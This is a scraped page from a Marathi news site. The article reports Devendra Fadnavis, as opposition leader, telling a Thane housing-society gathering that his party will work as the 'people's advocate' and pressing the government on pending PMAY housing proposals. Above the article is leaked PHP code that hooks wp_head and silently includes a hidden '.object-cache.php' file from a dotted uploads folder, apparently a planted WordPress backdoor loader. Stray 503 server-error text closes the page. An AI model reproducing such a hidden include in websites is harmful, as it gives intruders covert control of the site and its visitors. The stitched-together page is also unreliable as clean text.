add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जनतेचे वकील म्हणून काम करू – फडणवीस – SOCH INDIA
Menu

देश
जनतेचे वकील म्हणून काम करू – फडणवीस

nobanner

नव्याने स्थापन झालेले हे सरकार किती काळ टिकेल माहीत नाही. मात्र, तोपर्यंत आम्ही जनतेचे वकील म्हणून काम करू असे मत विरोधी पक्षनेते देवेंद्र फडणवीस यांनी व्यक्त केले. आमदार संजय केळकर, निरंजन डावखरे आणि ठाणे जिल्हा हौसिंग फेडरेशन यांच्या संयुक्त विद्यमाने आयोजित करण्यात आलेल्या गृहसंस्थांचा मेळावा या कार्यक्रमात ते बोलत होते.

विधानसभा निवडणुकीत जनतेने आमच्या पारडय़ात मते दिली होती. मात्र, आम्हाला सत्तेत बसता आले नाही. असे असले तरी आम्ही जनतेचे प्रश्न सोडविण्यासाठी जनतेचे वकील म्हणून काम करू असे फडणवीस म्हणाले.

राज्यातील सध्याचे सरकार हे स्थगिती सरकार आहे. ठाणे जिल्ह्य़ात आमच्या सरकारच्या काळात प्रधानमंत्री आवास योजनेअंतर्गत एक लाख घरांचे प्रस्ताव आले होते. या घरांच्या माध्यमातून मध्यवर्गीयांना घरे उपलब्ध होणार आहे. या प्रस्तावांना सरकार स्थगिती देणार नाही, अशी आशा आहे. तसेच सरकारने लवकरात लवकर या प्रस्तावांवर निर्णय करावा असे फडणवीस म्हणाले.

तसेच गृहसंस्थांच्या विविध प्रश्नांविषयीही फडणवीस यांनी उपस्थितीतांना मार्गदर्शन केले. मुख्यमंत्री असताना माझ्याकडे संकुलातील पदाधिकाऱ्यांविषयी अनेक तक्रारदार तक्रारी घेऊन येत असत. मात्र, यातील अनेक तक्रारी खोटय़ा असतात. अशा खोटय़ा तक्रारी करणाऱ्यांवर कारवाई करणे आवश्यक आहे. कारण त्यांच्याकडून अधिकारांचा दुरुपयोग होत आहे. अशा प्रकरणांना आळा घालण्यासाठी मी प्रयत्न करणार असल्याचे त्यांनी सांगितले. तसेच भाजप सरकारने नगररचना विकास विभागात मागील पाच वर्षांत जी विकास कामे केली. ती विकासकामे मागील ३० वर्षांत झाली नसल्याचा दावाही त्यांनी केला.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.